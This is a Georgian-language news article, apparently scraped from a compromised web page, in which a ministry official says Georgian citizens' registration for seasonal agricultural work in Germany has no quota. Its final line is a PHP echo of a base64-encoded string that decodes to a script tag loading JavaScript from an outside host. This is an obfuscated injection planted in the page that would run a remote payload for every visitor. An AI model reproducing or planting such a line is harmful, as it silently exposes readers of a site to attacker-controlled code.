celsiusi
ავერსი შნაიდერი
ჯანდაცვის სამინისტროს შრომითი მიგრაციის საკითხთა სამმართველოს უფროსი, გიორგი ბუნტური აცხადებს, რომ გერმანიაში ლეგალურად დასაქმების მსურველი საქართველოს მოქალაქეების რაოდენობა შეზღუდული არაა.
 
როგორც მან „ინტერპრესნიუსს“ გერმანიაში საქართველოს მოქალაქეების ლეგალურად დასაქმებაზე საუბრისას განუცხადა, ქვეყნებს შორის დადებული ხელშეკრულება არ ზღუდავს გერმანიაში დასაქმების მსურველების რაოდენობას და ვაკანსიებზეა დამოკიდებული, თუ რამდენი საქართველოს მოქალაქე დასაქმდება რეგისტრირებული მსურველებიდან.
 
„დღეის მდგომარეობით, პორტალზე დაახლოებით საქართველოს 95 771 მოქალაქეა რეგისტრირებული. რაც შეეხება რეგისტრირებულებიდან დასაქმებულების რაოდენობას, ეს დამოკიდებული იქნება გერმანელი დამსაქმებლების მიერ მოწოდებული ვაკანსიების რაოდენობაზე. ვაკანსიების მიღება დაწყებულია და პერმანენტულ რეჟიმში გაგრძელდება. 2017-2018 წლებში, როდესაც გერმანიასთან ამ სფეროში თანამშრომლობაზე დავიწყეთ საუბარი, შევთავაზეთ, რომ თავდაპირველად საპილოტედ 500 კაცი გაგვეშვა, თუმცა იმის შემდეგ ბევრი რამ შეიცვალა, სისტემები ბევრად დავხვეწეთ, შესაბამისად, მასშტაბებიც გაიზარდა და გერმანიასთან უკვე 500 კაცზე საუბარი აღარ იყო. ხელშეკრულებით არავითარი კვოტა არაა განსაზღვრული, რომელიც დასაქმებულების რაოდენობას შეზღუდავდა. შესაბამისად, როგორი მოთხოვნაც იქნება, იმის მიხედვით მოხდება დასაქმება. ზუსტ ციფრს ცხადია, ვერ ვიტყვით, თუმცა დასაქმებულების რაოდენობა აუცილებლად ათასები იქნება. ამასთან, რა თქმა უნდა, ვინც რეგისტრირებულია, წელს ყველას დასაქმება ვერ მოხდება. ლოგიკურია, რომ მსურველი ყოველთვის მეტია, ვიდრე სამუშაო ადგილი“,- განაცხადა გიორგი ბუნტურმა „ინტერპრესნიუსთან“ ინტერვიუში.
 
ცნობისთვის, საქართველოს მოქალაქეების გერმანიაში დროებით ლეგალურ დასაქმებაზე რეგისტრაცია 15 თებერვლიდან დაიწყო. დასაქმება შესაძლებელია სეზონურ სამუშაოებზე სოფლის მეურნეობის სექტორში, 1-დან 3 თვემდე ვადით.
 
გერმანიაში ლეგალურად დასაქმების შესახებ ინტერვიუ ვრცლად იხილეთ ბმულზე.
 
წყარო: IPN 
1476
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");